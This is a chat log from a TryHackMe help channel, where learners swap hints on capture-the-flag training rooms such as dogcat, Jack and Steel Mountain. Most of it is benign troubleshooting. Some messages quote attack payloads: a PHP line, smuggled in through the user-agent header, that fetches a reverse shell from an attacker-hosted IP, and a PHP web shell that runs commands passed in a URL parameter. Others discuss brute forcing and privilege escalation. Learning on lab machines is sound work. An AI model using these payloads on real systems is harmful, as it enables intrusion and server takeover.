#room-hints

There's answer tolerance, so it's not likely to matter for longer answers

For anyone doing the dogcat room, walkthrough is out

https://youtu.be/zGDbi15Jkqw

nice, gonna spend some more time trying to figure out flag4 before i watch

guys could u help me with the year of the rabbit room

i have gained access to eli

but want access for gwendoline

?

take the note you find literally

look around

Check our leet s3cr3t hiding place?

got it

thanks

Man, I don't think I am meant for this 😄

Still stuck on

The question is so simple and everything I try to type in just doesn't seem to work

What room is this?

https://tryhackme.com/room/introtoresearch

Hint gives some good help as well as the * ‘s in the answer format...also I used https://byte-notes.com/number-bases/ to learn more about it. Hope it helps.

hmm I used that too, not sure what I am doing wrong

@dusky vigil - thanks for posting that walkthrough. I actually tried that ||php|| command in dogcat, I guess I got the syntax wrong. Do'h

@lofty flicker may be overthinking it. Question is just asking for the number base.

ummm i have a que about agent sudo room

@whole falcon ask it

which task or question are you on?

task 2 que 2 what i means how would you redirect yourself to a secret website

Somebody please help me with Game zon room, last task last question.. i need some hint.. wonder is it me doing somehting wrong, or the deployed machine acting crazy.. any hit is welcome

doesnt matter what payload i choose i cant connect to the machine

anyone can help me with the last task of the room 'learn linux' ?

Can you be more specific as to what you require help with as it will help others to help you.

Can you be more specific as to what you require help with as it will help others to help you.
@white salmon

have you done this room ?

hint for flag 4 dogcat please?

@stark glen check what the user you gained can run as root

@plucky adder check your hostname on the box

@thin valley by using (sudo -l) right???

@stark glen yes indeed

I will check it now @thin valley

@stark glen Good luck!

Any hint on this one? I tried a bunch of things and not getting close..

I suppose learn linux room. Sometime there are hidden users files try to catch them

Try find

ok I will try

@thin valley thanks a loooot bro🌹🌹 i have got the flag

@stark glen you welcome! keep the hard work 💪

Dogcat Nice Room 😄

Hey guys i'm currently at "The Cod Caper", last task to crack the hash

||Well, it takes time for sure.. :D||

Hey!! Trying to exploit CVE 2019-1388 on a Windows 2016 Server.

Retro/ Day 13?

But I can't get it to open a browser or any application!!

Retro/ Day 13?
@stuck fractal Yes

Yeah that's intentional

Look at the pins in #650425164894568455

Or the writeups for the box

@frank dirge Did you check your VPN connection? Or you can try to restart the VM

Look at the pins in #650425164894568455
@stuck fractal doing that

@onyx bramble That doesn't matter

oh, thought it was a room

@onyx bramble It is, but the issue isn't with the VPN

Hello my "problem" its about juiceshop room task 5, i want to reset jim's password to find the answer of the secret question but im kinda lost, some ideas?

OSINT

@stuck fractal so the intended way is to launch both the browser and then launch the exploit again right?

There's another way

@stuck fractal Spamming the Ok button?

no

Amusingly

Different privesc

Hey guys

Doing WebAppSec 101
I'm trying to use a battering ram attack to bruteforce a username and password with burpsuite
The free edition of burp is throttled though, any good alternatives?

That actually works

Theoretically

@white salmon Hydra, wfuzz

Perfect, appreciate it

@stuck fractal kernel privesc?

Kernel?

Keep looking

@stuck fractal a little help. Is there any other privesc in this box?

Or is this the only one?

There's more than one

Look at writeups if you get stuck

@stuck fractal I overcomplicated the question I was on, got it a different way, cheers

@stuck fractal Okay. Looking around. Although almost all the write-ups are using the 2019-3688

Is there anyone who can help me with a nudge for “Jack”?

Let me try. What's your problem @white salmon ?

hi there, I would need some hint / help for https://tryhackme.com/room/thecodcaper the cod caper room, task#5 "what is my ssh password". Following the instructions the two files that I found valuable are || ssh/id_rsa and ssh/id_rsa.pub || when I "cat" those 2 , I see information but dunno what should be my next move , any suggestions ?

Look for files belonging to all users

okay

oh boy, I got the password !

😄

@signal perch nice!

@frank dirge I don’t have much time my account expires . Which word list ? Rock you ETA is 10 hours

I mean

Theoretically you could just keep extending

@white salmon

I did but then fell asleep

could anyone help me with the intropython challenge? I'm getting the error "TypeError("argument should be a bytes-like object or ASCII not 'TextIOWrapper'" when I read the file and try to decode it.

google says to convert to ASCII use the ord() function but that converts strings. could anyone provide a helpful hint please?

google says to convert to ASCII use the ord() function but that converts strings. could anyone provide a helpful hint please?
@noble tinsel **converts chars

Not without seeing the code

But that's the wrong method

what is the right method? it mentions it's encoded 5 times with base 16, 32 and 64 so I thought I was missing a step

You need to actually read the file

Have you tried working through the room first?

It covers reading files

yes i worked through the room. I see the error now ill keep at it. thanks

I wonder if that script would even work.

It wouldn't I don't think

@floral spindle yes. You need to follow the other instructions

Create the variable

Otherwise it will crash

Can anybody assist me with The Cod Caper?
Please DM me 🙂

Just ask here, or in #room-help if you want more than a hint 🙂

If I have the users private key, should I still be prompted for a password when I ssh in?

I also tried uploading my public key, but I am not having any luck 😦

@mental osprey you should, yes. That only works under very specific circumstances

The key also needs to be properly formatted and permissioned, or it will just be ignored

Yeah I did format the private key and give it the right permissions...
If I have uploaded my public key to the server though (it isn't password protected), howcome I can't SSH into the box with it?

@inland onyx Can I DM you with some more info?

If you uploaded YOUR public key to the remote user's .ssh/authorized_keys file, then that will work

is that box Panda?

or Food?

@white salmon not koth

ooh ok nvm

@inland onyx Yeah I had done that... Can you maybe just assist with where to find the user's SSH password?
I think the SSH attempt isn't working for me 😢

Look for files belonging to all users

That's the hint I always see

If this is for Cod Caper, yeah, you're better just searching for files belonging to other users

i had a simular issue there searching for files owned by ||pingu||

no pw file to be found

||find / -user pingu -type f 2>/dev/null||

Who says it's owned by that user?

||pingu||

says

Assuming my father hasn't modified since he took over my old PC, I should still have my hidden password stored somewhere,I don't recall though so you'll have to find it! find is the recommended tool here as it allows you to search for which files a user specifically owns.

Doesn't mean it's owned by them

How do you tag spoilers?

double pipe

||

|| ||

im dying

@spiral stag don't die

🙂

was a fun box tho

im loving pwntools

😁

I am totally stuck on jack escalation to root

@wraith fulcrum You can pm if you need a hint 😄

Don't post spoilers here

kk

Room Linux challenges .Task 2 no 7..give hints to find out the flag7

sure let me check my notes

@halcyon citrus you need to list ALL process running, especially system ones

by using systemctl command ?

no

google how to list all processes

ps command?

yup

got it! @glossy basin

good! 😺

I did it like 3 days ago, DM me your answer @small mortar

can you help me in one more task.task2 no 10 @glossy basin

+1 let me know if it's something I need to investigate @stuck fractal

mhm 1 sec

from the same linux challenges room @glossy basin

@steady stratus might be worth checking

Mhm aye, yeah either lemme know what Nuclear's answer is or @small mortar you can dm me and I'll verify 🙂

Nope nvm

@halcyon citrus but there's a hint in the question

Answer correct, prompt missed

it's more than enough

Ah okies

nice!!

i searched through home directory, i haven't found flag 10 file @glossy basin

@halcyon citrus check the hint

ok i will check @glossy basin

just read the file stated there

and you'll get it

just one hint is it a txt file ? @glossy basin

do the VM's in rooms have internet access? Asking because the exploit that needs to pull nc.exe from your webserver will work if I give it the internal ip of the Kali box, and will not work when using the public IP address of the Kali box.

No they don't have internet access

Only the kali VM has internet access

ok, great now I understand why it wasn't working with public IP. thanks

just one hint is it a txt file ? @glossy basin
no

it's inside the file stated in the hint

got it bro. easy one but i searched in wrong place @glossy basin

good good 😄

May someone give me a hint in webappsec101 [task 4]? I think im making the hydra command wrong

@white salmon there's no bruteforce in that room

read the hint

it gives me a list of usernames, thought i needed to bruteforce or something @glossy basin

is this where i get noob help?

what do you need? :)

@white salmon no, check the pictures inside the app

and see who posted them

and you get the answer :)

ok so, i am on the burpsuit room, and i am unable to load https websites after adding the certificate (i am connected to the proxy)

it doesnt give me the error message it just doesnt load

look burpsuite

you just need to click forward to let it load

oh i see, can i forward all ?

well, you can just intercept from a specific ip

so it doesnt intercept everything

@crimson helm

oh! i see how this works now! thanks

np ^^

@glossy basin i kina don't understand what you say, asks me to log in if i click in a picture

are you logged in

?

in first 2 questions of task 4 you get credentials

as admin

but thank you i think i get what i need to do

yeah got it thank you :D

good!

:)

@crimson helm ... can you not?

It's not in the slightest bit relevant

my bad wrong channel

Hi, everybody! I'm looking for a hint on the Day 2 challenge of the Advent of Cyber room. I ran dirbuster using the wordlist as instructed but I haven't found anything suspicious. What am I missing? Thanks.

about bruteforcing hackpark login page, am i supposed to use the switch for ssl connections? i'm running rockyou, but without results

Is it an SSL connection?

If not, don't use SSL

😅 i've made a mistake with zap and the page appeared with the zap ssl certificate

i've received 16 good passwords... i think hydra is not working properly

does anyone have any idea how to complete flag 26 in linuxctf?

@rapid hamlet use find command

@glossy basin yes, but I've used it and no luck at all

https://www.howtogeek.com/435164/how-to-use-the-xargs-command-on-linux/
read this ^

should be useful with it

kk

tyty

can someone help me with hackpark bruteforcing? i think the hydra command is right, but i keep receiving a lor of false positives

Normally means you odn't have the command right

Especially after the last colon

ok, thanks @stuck fractal . i was filtering based on fail and not on success

huh?

The bit after the last colon should be how it detects a failed login

i've used ||S=/admin||

@still elm Does that appear in failed requests?

https://redteamtutorials.com/2018/10/25/hydra-brute-force-https/

i've got the ?ReturnURL= in the POST request, so i stripped out that part and added it as a success

"S=" is that how hydra works?

from hydra -U http-post-form
Third is the string that it checks for an *invalid* login (by default) Invalid condition login check can be preceded by "F=", successful condition login check must be preceded by "S=".

(ALL : ALL) NOPASSWD: /bin/mount /dev/*
i found this through sudo -l
how to use it to priv esc

That strikes me as being a little more than a hint

Also, well done getting through the RSA...

i can't seem to find a way past that

thanks

@still elm Interesting

I've only ever seem that fail

got the password but not the flag kinda different and interesting @inland onyx

Can anyone tell me which password dictionary to use for Jack ? I have tried for days rockyou

@white salmon Then you've been trying wrong

I got a login with that

Can anyone tell me which password dictionary to use for Jack ? I have tried for days rockyou
@white salmon how about, you try some of seclists

can anyone help with hint on year of the rabbit

???

Where are you stuck @sinful plaza?

Hello new to THM started the blue room on this past Sunday 04/19/20. I got to the end of task 3 , ran the metasploit exploit it says it ran the exploit but did not start a shell. I've tried restarting the room several times in the past 2 days . Question is there something else I need to install on my computer for metasploit to actually connect with a shell?

Is your VPN on the host or VM @pure thistle?

Host? It's on my computer in my thm folder

What OS are you using?

Mint19

Could it be a problem with terminator should I just use the default terminal that comes with Mint19

Nah

Chances are that it's just EternalBlue being iffy

It's not the most stable of exploits

Keep trying

Ok thanks

@pure thistle Also, make sure you're using your TryHackMe VPN IP as your LHOST

^^

Humm ok . I thought it said I only had to set RHOST but I will check the LHOST tomorrow thanksninjajc01

Oops. NinjaJc01

Im not sure how to do the Learn Linux room

on task 11

I did 'touch noot'

@white salmon That created a file, called "noot" not "noot.txt"

Understood

@white salmon you have to add your extension to the file. (.txt)

I think I might have to be connected my machine

For it to work

...

Did you create that file on your own machine?..

Just in case

Are you ssh’ed into the box you deployed??

No

No to which question ?@white salmon

ssh

Did you skip the first few tasks?

No

You have to connect to the deployed box in order to capture your flags

They havent taught me ssh

this one is my first machine

Connecting to the machine is covered in the first few tasks of the room

Its in task 2 I believe

I seemed to have forgotten it

But yes your right

Did you download the access file for openvpn?

Yeah, we already had that conversation..

Copy.

You're on Mint, right?

ssh shiba1@<Machine_Ip>

Password is shiba1

Yeah, then all you have to do is deploy the box, ssh into it, and knock out each task. I’d advise not skipping any steps. Cheers! @white salmon

Yay

I did it

🙌🏼

Okay so I need a hint on the lfi box I have the ssh key I changed permission to 600 and I'm still getting invalid format. What am I doing wrong?

@cloud perch invalid format means the format isn't quite right. Check the proper format for a key and check what you have

Hello I'm on vulnversity again, and I'm having trouble with task five question one

The hint doesn't help as it is a command that just shows me what looks to be like every file with a permission denied statement

@stuck fractal yeah I fixed it. Thanks already completed the machine

Hi, I'm in the Common Linux Privesc room, and I'm stuck on the exploiting writable /etc/password part where i need to hash the password with " openssl passwd -salt [new] [123]", is the output i got from running this command the answer to the question or i need to look somewhere else for the answer

openssl passwd -1 -salt [new] [123]

I tried the output i got from the command, its not the right answer, where else can i look for this salted password?

Ugh I'll just leave the room for now, don't think much help will be offered at midnight (I thought u hackers like the dark)

@crimson helm There's a way to filter out the permission denied statements

Oof, how's that? and do you know if that will filter out what I'm looking for in the question?

so append 2>>/dev/null to your command

note that /dev/null essentially trashes any input it's given and 2 is short for stderr (error messages)

I got it, however it doesn't really stand out from any other file, it is called systemCTL

Sorry to b a noob but I ran it, and I am unable to find any txt files in the output

Or root directory

before finding the .txt files, try to do what question 1 says about finding all suid files

(check the hint)

@tardy drum can you help me out

sure @bright steeple

Is there something im supposed to do with systemctl? Or am I just being pointed in the wrong direction

No there is

@crimson helm you can Cat some high level files

The results that come from systemctl, are they like files?

@crimson helm That's a good question for google

@tardy drum I'm in the Common Linux Privesc room, and I'm stuck on the exploiting writable /etc/password part where i need to hash the password with " openssl passwd -salt [new] [123]", is the output i got from running this command the answer to the question or i need to look somewhere else for the answer

@bright steeple I haven't done that room yet because i am not a subscriber

Found some useful material, but I still don't know how to cat a service

@crimson helm try searching up "systemctl privescs"

@tardy drum ok

Yeah I still am a little lost, I'll just get on tommorow

Well today but later since it's 1 am

Rip

Who's done the dogcat box already I need a hint for the first flag it saids there more to view. But I'm confused

anyone has been able to root Jack "the proper" way?

anyone for a sanity check on radare the_final_exam?

i think i know what happens in ||sym.get_password|| but cant get it to work

hello

Morning @white salmon

morning @white salmon i was about to ask a question and i remembered that i haven't done any research yet

does sqlmap show you the types of injection a server is vulnerable to

SQLmap isn't really my forte however I believe it does.

I'm sure somebody with better experience of it will be able to better answer your question.

Or Google 😉

i am trying to look and i cant seam to wrap my head around that idea

yeah i am trying to go over the manual page now

@white salmon have you done a manual sqli

hi all

you see i have found 2 but the question said bang... wrong answer

Remind me which topic and question your on Prexe

Hi @shadow basin

finding How many types of sqli is the site vulnerable too

Which topic?

by topic you mean...

ccpentesting

@white salmon interesting

i know that sqlmap test for 5 vulnerabilities

@white salmon have you tried to formulate the SQL query

boolean based
Time-based
error-based
UNnion
and stacked

@violet fog didn't do it manually

is there something i am missing?

okay OWASP TG

Is there anyone who can help me with dictionary for jack

@white salmon mate, in the time you've been asking, you could easily have just tried it yourself.
Pretty sure I've already said this, but these channels are for helping people with things they don't understand.
You've been told that the dictionary you need comes preinstalled with Kali: that's your hint.
No one is going to go further than that. Go have a try for yourself -- we're not here to do it for you.

I’ve tried rockyou.

||The password is not in rockyou....||

@tidal sedge seclist?

Just go try random wordlists I'm sure you'll **eventually **find it.

I’ve spent days running rockyou. I just want to complete this box before my OSCP exam

||The password is not in rockyou.||

That helps. I’ll try others . Thank you

hey i'm having a problem with running the msf exploit for steele mountain
it says exploited completed but no session is made

@white salmon I had issues with jack and brute forcing. there is a good list but sometimes it won't hit on a successful login even though the password is in that last.

lis*

list*

hello all

who completed the challange syfonos6?

can you ping me please

?

Just ask your question here and hope someone helps

there is a bug regarding flyspray that I don't know for what reason is not working to me at all. I've tried to restart the vm several times but no success

I am uploading the script file in order to create a new admin user and for some reasons is not creating the user

i hit a wall on the dog cat room

i can't get a reverse shell 😦

have been trying for over 10 hours

!writeup plethora

@eager flax i had that problem to try to use something like this ||<? file_put_contents('shell.php', file_get_contents('YOURIP/SOMEREVERSESHELL')); ?>||

||set it as a custom user agent and navigate to a page where you can view some logs....||

there is a bug regarding flyspray that I don't know for what reason is not working to me at all. I've tried to restart the vm several times but no success
I am uploading the script file in order to create a new admin user and for some reasons is not creating the user

@robust hearth thx for the suggestion, i already tried that some hours ago without luck

Are you using a VM?

my tiredness and frustration have build up already for the day, i might try once more...

@stuck fractal yeah

And you're setting the LHOSt in the rev shell to your VPN IP/

no

the ip from my vm

Subscriber kali?

the thing is i cannot upload the php-reverse-shell and when i do with curl i cannot locate it anywhere 😦

yeah subscriber kali

the one-liners don't work

In the room Vulnversity they ask to use a wordlist which I don't have in my Kali system (using windows 10 with the subsystem linux) I downloaded dirbuster-ng on Github but none of the list are working.
Any help here ?

Avoid WSL

wsl?

Not you

ok

i see..

@cobalt rock You can get wordlists for directory bruteforcing, but still I recommend avoiding WSL kali for a few reasons

@eager flax try hosting your shell instead of using a one liner

i only tried one liners as an extreme measure

but no lick

I mean you have RCE

Think about how your RCE works

And what kind of RCE you have

Also make sure you're using the LAN IP not the public IP for the kali VM

yeah i use the lan ip

@eager flax as @stuck fractal mentioned you have RCE. Google LFI to RCE. Should help

@remote gate Oh no, it's not ||log poisoning|| is it?

I need to try it still

yes it is

i have been through this

i will once more

@stuck fractal it might be

i suck on webapps 😦

Did you see your shell uploaded then browse /shell.php or whatever the name of the shell you uploaded is?

i just downloaded pentest monkey reverse php shell spawned a webserver using python and uploaded it, with ncat listening on a port on my win machine

i did saw them on http server getting requested and transfered

and then i cannot find the file to run it

Should be just /shell.php

yeah i know

normally that would be IP/FILE

@robust hearth how did you send it over?

i only could with curl

wget doesn't work for me

||<? file_put_contents('shell.php', file_get_contents('http://IP/shell.php')); ?> set that as my header user agent in tamper on google chrome||

i tried that, i always getting an error trying to resolve

weird that did the trick for me...

i'm trying once more

Works fine... for me

I'm using the pentest monkey php shell btw but it should work with any shell....

ofc if you executed faulty php code ||in the logs|| before that one you should reboot the machine :p

i've rebooted the machine ~10 times today 😄

Try it with pentesting monkey shell?

@stuck fractal why you don't recommend using WSL ? What are the other free options ? pendrive with kali / dualboot / virtual machine ?

WSL can be really interesting over a network

By interesting

I mean, it frequently doesn't work very well

well in this case I'm just missing the worlists's files to use with gobuster

@cobalt rock Virtual machine

basically, WSL is quite restrictive

@stuck fractal Ok thanks !

doesn't work

😦

i'm going to take a break and try again

i'm doing something wrong 😦

im having trouble with that pumpkin ctf wireshark thing

last question about that audio file what should i even put in everything is returning me an error

is it like the show or something or the girl saying it? cause it really isn't working

Hi! I am having trouble with one of the "Steel Mountain VM. I am at [task 2] Initial Access and for several hours I've trying to use Metasploit to gain access with "windows/http/rejetto_hfs_exec" and the error keeps repeating server stopped. I also tried the kali browser to see if it was my kali vm but I get the same error. I am I missing something because I thought the step was pretty straight forward by adding the RHOSTS = Target IP

@eager flax there are writeups for it if you really get stuck. I ||used burp to intercept the page then included something like "<?php echo system($_GET['lfi']) ?>" in one of the lines||

@remote gate I appreciate your devotion to help me solve my issues with the box man! Thank you a lot!

@stuck fractal Thank you too bud for your help

any tips for agent sudo's priv esc? I cant manage to find the CVE I've tried linenum and three exploit suggesters on the target machine

Have a look at some of my tutorial rooms @vestal igloo 🙂

It's covered on the site

@eager flax there are writeups for it if you really get stuck. I ||used burp to intercept the page then included something like "<?php echo system($_GET['lfi']) ?>" in one of the lines||
@white salmon tried that but didn't help.. I managed to get shell with some help from #room-hints

@restive light Check the RPORT 😉

@inland onyx excuse my ping just wanted to thank you since I was stuck for a while

Np

I thought the second common private home range was ||192.186.1.1||?

@white salmon That's not the range, that's an address in the range

the way you notate the network ends in a 0

oh

thank you

i'm stuck in the beginner room for linux, i can't find how to run a binary file 😩 any hint ?

@white salmon Re read the tasks

it tells you how

There's literally a task with the title "running a binary" @white salmon

ok thanks

hey guys can i get some hint for agent sudo codename part?

-i've found out tht it's a ubuntu machine so i tried all the ubuntu version codenames but still it doesnt work

I don't know the actual method

Try a lil OSINT

i try to find the alien picture too

end up in the fb page

You're not meant to end up on facebook IIRC

ok i'll give OSINT a try thanks for the hint @stuck fractal

@dense marlin Agent R?

agent r is the person announcing right?

R signed a lot of the letters yeah @dense marlin

seems like a clue for me thanks man

@stuck fractal i think i found a way to pass it without using OSINT

I think I kinda guessed it

as agent R, the codename is single character right

so i just use my burp intruder to help me out testing each char, and found a good php page man

Interesting

indeed, it's an interesting room

Currently stuck on Task 11 in the CTF Collections vol.1 room.

It gave me a .png binary file, which I converted to Hex.
I tried to put the file through CyberChef but it says invalid file format.

Just wondering if I'm missing a step in between?

Oh nvm, finally figured it out 🙂

Currently stuck on the WebAppSec 101 room, where I have to look for a log in username, the hint is to look at a name list on github. but what should i do with the name list?

i tried using the medusa brute force with the name list but it doesnt seem to work out

can someone give me a hint?

has anyone done steel mountain

did anyone else have a hardtime getting the powerup.ps1 on steelmountain to run

@bright steeple actually i didnt use that, I'll just say check pictures and see who uploaded them

hello

hi

you need a hint?

oh no :)

sweet. lol

Can anyone help me in CC stegnography Final Exam, I found port 80 open, so opened it in browser but can't find any key

@long fog it's steg. Look for steg

Looking at the new strings room. Question 1.3 is ||
What is the name of a type of data that could be stored within a string?|| but not sure of the answer, it's not really clear what it's asking for although think I'm probably being stupid, I've tried ||usernames, passwords, credentials|| but think I'm missing something

think a bit more high-level @white salmon stuff like usernames for example are text

Hmm, okay, will have a think. Cheers 🙂

what would you class a pin number as? (I'm gonna add that as a hint to clarify a bit better)

(rhetorical question btw)

Sigh, got it. I suck lol
Cheers

🙂

Im stuck on shiba2 on the learn linux room

im stuck

And I need hints

Advent of Cyber - Ho-Ho-Hosint, stuck at number #2 and #4

@white salmon Create the variable, set it to $USER

nevermind finished #2 just #4

@karmic acorn If it's the question I think it is, some math

||export test1234=$USER||

Im not sure what to do next

Run the binary? @white salmon

oh lol

@stuck fractal something about date

What date did Lola first start her photography? Format: dd/mm/yyyy

@karmic acorn Yea, so IDK what you've found

idk?

i know you shouldnt help me, but the php reverse shell for vulneristy doesnt seem to work for me? im using my internal ip and listening with port 1234 (netcat) any suggestions why it keeps failing and saying connection timed out?

@tranquil wing we shouldn't help you?

Where's your VPN running?

its for uop vulnersity room, its running on my pc whilst im using kali vm on the site

Then you need to use that kali VM's IP

oh ok

Just don't say UoP vulnversity

Just say vulnversity

They're identical other than Tobi adding some files

ah wondered why it said vulnersity, thank you

@tranquil wing https://tryhackme.com/room/vulnversity for reference

ah ok i see what hes done, cool thanks man

worked a charm, thanks again

doing the HackPark room and I can't seem to find the right flag for what the OS version is. Its not the OS Name or OS Version from systeminfo and its not what it says windows exploit suggester says it is. Can anyone help?

can i get a hint on the last problem for zthlinux

@wheat gorge Look for files belonging to each user

i can't understand the beginner first challenge in linux, run the binary file, i can't find it, any clue

?

learn linux room? @white salmon

yes

which task?

first challenge task 11

Have you read the note to that task?

yes

just run shiba1

i gonna try again

yes ! thanks

i'm realy dumb 🙂 this challenge took me a day 😆

not dumb, still learning

^

Just started steel mountain unable to figure out "Who is the employee of the month"

@dusk bobcat Load the page

For room Blue, how do i determine what the machine is vulnerable to?

is this another nmap command, or some other piece of information i need elsewhere?

@white salmon have you ran any nmap scripts?

yup, scanned the machine for ports

the hint is Revealed by the ShadowBrokers, exploits an issue within SMBv1

is there an nmap feature im not aware of?

oops. yeah.

sorry. noob here

--script vuln

It's all good. Let me know if that tells you the answer. I had to boot up to check if it would

yes it does!

what linux distro do you use, if you use one?

kali for now

right, figured

ive used fedora for a long time thanks to my professor

hi all - SQLi labs. I've got this URL: http://<ip>/sqli-labs/Less-9/ .....how am I supposed to begin the SQLi? In general chat, someone said I should look at doing it via the URL, but, am I supposed to use dirbuster first? Just need a little push to get me going

Actually, I think i've got it (sorta). ||?id=1||

anyone here done madness?

nevermind... that's so dumb ffs

@nocturne vault do you need help?

nah, got it

just thought the solution to the part i was stuck was pretty dumb

just thought the solution to the part i was stuck was pretty dumb
@nocturne vault i suppose you were stuck where i got stuck 😅

probably 😄 ssh pw

yep

hello all

https://tryhackme.com/room/introtopython the challenge on this is driving me up the wall. 😆 When looping through decoding I 16 and 64 bit are fine when encoding, but b32 claims to have non-32 bit chars even when encoded

I am trying to do the challange of jack of all trades but firefox is telling me that the page is restricted. I tried to go on about:config and add the network.security.ports.banned.override

but is not working even after that

any ideea on how I should resolve this?

Mine is sorted 😛

Has anybody completed the Learn Linux room, I'm stumped on Task 21

Has anybody completed the Learn Linux room, I'm stumped on Task 21
@mental lichen I have 🙂

let me have a look

thanks, it's to do with environment variables

I got stuck. https://muirlandoracle.co.uk/2020/03/10/learn-linux-write-up/

here's a write up on it

you have to use export to change the user to test1234

I really don't want to look at a write up yet, surely it should be simple. I just want to check with someone if my theory was correct

ok, you have the right idea then for sure

I tried to set the variable rather than using export

But I get a segmentation fault when I run the binary

yeh, I got the same

I am trying to do the challange of jack of all trades but firefox is telling me that the page is restricted. I tried to go on about:config and add the network.security.ports.banned.override
but is not working even after that
any ideea on how I should resolve this?

not sure, bud @echo thunder

https://stackoverflow.com/questions/1158091/defining-a-variable-with-or-without-export

@mental lichen

I am an absolute chump, lol

lol I got stuck on it for ages too man

thank you so much

good!

hhh

🍉

jj

j

j

i cant seem to find the ssh password in the room thecodcaper

i have the reverse shell and im on the www-data user

i used find / -user pingu to find all files owned by pingu, but i cant find where the ssh password is

i saw an id_rsa and id_rsa.pub in /home/pingu/.ssh and tried to use that but it refused the id_rsa private key i got from the server and tried to use

am i doing something wrong?

Who says it's owned by pingu? @white salmon

oh

what should i be doing then?

and i tried to put the id_rsa.pub in /home/pingu/.ssh/authorized_keys too

You have it

hm?

u need to change premison of that key to be able to login without password

oh

hm ok

but now how do i make pingu the owner of authorised_keys, chown says the operation isn't permitted

can I get any hints for blueprint?

cant use any of the links cause url changes to localhost

@white salmon u need to change premison of id_rsa to work with ssh command

I might be wrong, but I think the id_rsa is a rabbit hole here

@stuck fractal not really sometime you need John to help

No, here.

@stuck fractal yes, if it codCoper

or that the way i did it

I remember pars saying that whole thing was a rabbit hole but OK

yeah id_rsa doesnt work

on cod

@stuck fractal let me re-check

There are two people telling you the opposite

@vestal igloo Maybe you can change where localhost points

i was worried i could ruin something or i was digging my own rabbit hole somehow thanks for affirmation

@vestal igloo I might be wrong

i guess i will have to find out plus its something good to learn so no harm

bless your soul

Hello all

did anyone complete strings challange

?

Dark was having trouble with the bitcoin address on stream yesterday

yes

I cannot find the bitcoin address

@steady stratus Investigate

Dark couldn't find it either

Are you using the suggested windows VM? @echo thunder

Dark was

yues

yes

I've tried also on kali

Dark couldn't find it either you say? @stuck fractal

Yep

I think it broke

I'll have to look at his vod when I finish my shift in a couple of hours

yikes okay uhh

ok

no proble,

problem

until than I will search again every line

sorry pal - I'll have to investigate when I can tonight

@steady stratus found the wallet

needed to restart

the windows vm

did anyone complete the symfonos6 challenge?

hey all - on the CTF-ToolsRus box, it says to use a Nikto / Nmap scan and give the name and version of the software for task #6. I did this but it didn't give me the correct answer. Is there a blooper or something i'm doing wrong?

@hasty gust Make sure you go for the right port

I can't say which as it's an answer

@stuck fractal i'm pretty sure I did , but i'll re-try. I went for a port with increasing numbers (without giving it away hopefully)

DM me your answer then @hasty gust

In steelmountain how do I replace the legitimate binary?

What did you try?

@white salmon ||I hear powershell is a good tool.|| But of course there might be other good tools. I guess thats my hint. Sleep well 🙂

@white salmon Metasploit has an upload feature if you have a meterpreter. Otherwise, you can host it on a webeserver and grab it

yeah have done both of it, also have an idea :)

ty for answering btw

So I am doing the volatility room right now and did all the volatility parts but I can't upload the file to hybrid analysis because its too big

and the other one doesn't give anything

so uhm what could I do?

there are no writeups so Ican't get the answer anywhere

@steep tiger Read the question carefully

What are you uploading?

mmm

might have to be the dlls instead

but one problem then still

--pid is not an option

it doesnt exist

so I just guessed 12 because it was that before

It probably does, but only in conjunction with a different option

-_-

I am a dumbie

I forgot the dlldump part

yo guys

I need some help

with the room "thefindcommand"

in task #3 the 7th question

"Find all files in the /usr/bin directory (recursive) that are owned by root and have at least the SUID permission (use symbolic format)"

So it would be: find /usr/bin -type f -user root -perm ??

it doesn't specify whose perms it is for

SUID isn't a perm for a user @rapid hamlet

SUID is a special perm that applies to everyone

I know

but it doesn't specify who should "at least have the SUID permission"

/u=s?

/g=s?

I've tried those, it returns incorrect answer

That's not how SUID works

SUID doesn't belong to a user

SUID allows the person (anyone) running the binary to run it as the owner

It's a permission

Yes. But not the same as g=r

It's not split into UGO

It's a yes or no

so how should it be represented in symbolic?

Google it

I need help

I can't seem to find it

oh shit nvm, i did it

@stuck fractal ty

In steel mountain, after restaring the program, ||I need to migrate the process don't I? ||

@white salmon You need to listen for a shell

You need to get the new, more privileged shell

I mean, I did all of that but still doest work

I must be doing something wrong but huh

MJQXGZJTGIQGS4ZAON2XAZLSEBRW63LNN5XCA2LOEBBVIRRHOM====== Can somebody say me, how I can decode this? I'm stuck with this string

Which encode ends with =? @shell sun

there's a few

I don't know but it looks familiar

Well, investigate then @shell sun

I've been working on this code for about an hour

Then you haven't been researching the right things

Look at encodings

there's a few
@stuck fractal I can recall only 3, and I'm not sure with the least

few can mean 2

But I know at least 2

And I can tell you which one it is, but that's more than a hint

Do you know a good website, where all the encodings are listed?

There is a tool inside kali that could help you identify the encoding

@shell sun google "encodings"

More specifically, data encodings

Hi,anyone can give me a hint for flag value cc pentesting room (sqlmap — ?)

@white salmon Yes, use sqlmap

Thx

Thx
@white salmon https://www.binarytides.com/sqlmap-hacking-tutorial/

Oaw great man,cheers for this

Anyone able to help with App Locker?

I have run invoke kerberoast, but I'm getting token length and separator unmatched errors with the ticket.

@patent token I had that, with some really weird line break issues

Right. They pull far right.

If you remove linebreaks, it might work

But when trying to modify them I'm really not having any luck

So try going in just one really long line?

yep

On the ticket, for hashcat

krb5tgs?

yep

Attacktive?

Wait, Corp?

Yea

Corp

Yeah I had the same issue

I'll give it a whirl. Thank you.

That did the trick. Thank you again. I really appreciate it.

@patent token Glad it worked

Wouldn't have a hint on the encrypted password by chance? I've checked base64, base32, hash-identifier, etc.

@patent token Yeah read carefully

It's MS stuff

||I see the enabled true and plaintext false.||

@patent token I have a hint but it's more of a help

Help == hint for me. 😛

After 7 hours still not getting the value of the flag, cc pentesting room /sqlmap challeng,any hints pls?

so im currently doing https://tryhackme.com/room/zthlinux im on Task 11 which is wanting me to run a binary of a file called noot.txt but when i do ./noot.txt it says permission denied

can anyone help me?

Right, can you list the files in that directory and send the output here?

that last one is shiba1 btw

1 was cut out

So you've made the noot.txt file, now you need to run the shiba1 binary to get the flag.

ah ok

got it now thank you 🙂

For all the binary tasks, the name of the binary is in the task title

okay 🙂

Anyone know how to replace the process (with metasploit) in steel mountain

I tried a lot of things and it still didn't work

Any hints would be nice

anyone active

yup

what's up

What's up yo

@naive geyser how would you replace an archive in windows?

I'm trying it out now thx

I mean, dont know if you understand what I said

Sqlmap is broken ;

huh?

?

so @naive geyser did you figure it out? :)

not yet @white salmon

i had some problems with metasploit but i fixed them now

Hello everyone, I'm doing the learn Linux room and I am on the last task where you have to find a key. it says it is in root/root.txt, but if i try to go there it says permission denied :( Can anyone help?

@odd belfry yes, you need to gain root privileges

by privilege escalation

(check the write up if you are not sure)

Okay I will look. Thank you very much.

